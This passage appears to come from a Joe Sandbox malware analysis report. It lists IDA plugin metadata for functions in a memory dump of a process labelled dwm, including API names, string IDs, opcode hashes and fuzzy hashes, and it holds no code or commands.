                                                  • Instruction ID: e8a53568f0dba32b4d5a24a2854897bac3d8da60ced27080e187271e98667cdd
                                                  • Opcode Fuzzy Hash: 4fed39dde851fcd8fc4d049624dd97c798a08dd805cf236f1a62443ce0db6f3a
                                                  • Instruction Fuzzy Hash: D771C03260068146EE299E6998783AAF7B0F7AD784F640226DD8947B99DF34C608C761
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 60806b6e5981ec3bc5cc332c647bab245b1cb03d9a404e51140869ab20dc0ddc
                                                  • Instruction ID: 7f8103d5ffc69c73f3c1d4dd93c96aa87bfbf2b80f43e28f036e8496467d0de3
                                                  • Opcode Fuzzy Hash: 60806b6e5981ec3bc5cc332c647bab245b1cb03d9a404e51140869ab20dc0ddc
                                                  • Instruction Fuzzy Hash: 66519D2360468181EE789A29A47C3AAF771F3E9784F644225DED903B99EF39C40DC752
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: a661c2d173b23182f505dc60736120a771a3f0ad42df517ff57706cbb13cb6f8
                                                  • Instruction ID: e478315be37fdb54f972f863dde1e947ed72110a61f06c65eabc9185f905a3c1
                                                  • Opcode Fuzzy Hash: a661c2d173b23182f505dc60736120a771a3f0ad42df517ff57706cbb13cb6f8
                                                  • Instruction Fuzzy Hash: B341C472314A8082DF20DF25E8683AAB7B1F39C794FA44121EE8D87798EB7CC449C751
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: f7608c98f8767320f9864fb27da0f260c0020aa91a68daba2c90f21ed4f13150
                                                  • Instruction ID: 684c1ee73b76a874c58ef2917ddf82cb4d52711cb27376399da801e18edfe51b
                                                  • Opcode Fuzzy Hash: f7608c98f8767320f9864fb27da0f260c0020aa91a68daba2c90f21ed4f13150
                                                  • Instruction Fuzzy Hash: A211F872214B8082EB658B15E854259B7E5F79CB98F684225EFCD07B68DF38C955CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 6827040540fda7ad193ca04f20f1a702de29ed0253c6c81da601d7f1dcb7858b
                                                  • Instruction ID: b05f0208c1fda9a62a0d6b21fca75c352869846f4b86eed515673cf13c70c32a
                                                  • Opcode Fuzzy Hash: 6827040540fda7ad193ca04f20f1a702de29ed0253c6c81da601d7f1dcb7858b
                                                  • Instruction Fuzzy Hash: 25115B65B11B9082EE04CB66A41821DB7B0F78CFD1F6C4124DE8D93725DF38D84AC301
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 1f44e6271c1b5e39a937113a1e618e8eb6fe08943c73d2d47ba7f0255cfb855b
                                                  • Instruction ID: 72658987fa24c070f82f9c7ff93bf572132a53699d232be6d370c2dbda29f887
                                                  • Opcode Fuzzy Hash: 1f44e6271c1b5e39a937113a1e618e8eb6fe08943c73d2d47ba7f0255cfb855b
                                                  • Instruction Fuzzy Hash: 0BE0C9B171165087EB089B62D82C35977E1EB8CB56F598024898907350EF7D849DC761
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: a071b283022ea7c31aadf8865349afa3b666824985d16808c3a72c4ba9c96523
                                                  • Instruction ID: 1330b67ecaea48bec64ef16e0456cb48f009a3f93914ccd4c3ae3657d197a501
                                                  • Opcode Fuzzy Hash: a071b283022ea7c31aadf8865349afa3b666824985d16808c3a72c4ba9c96523
                                                  • Instruction Fuzzy Hash: BCE0E5B1711A5087EB089B62D81C25977B1FB8CB16F588024C94907720EF38849DCB21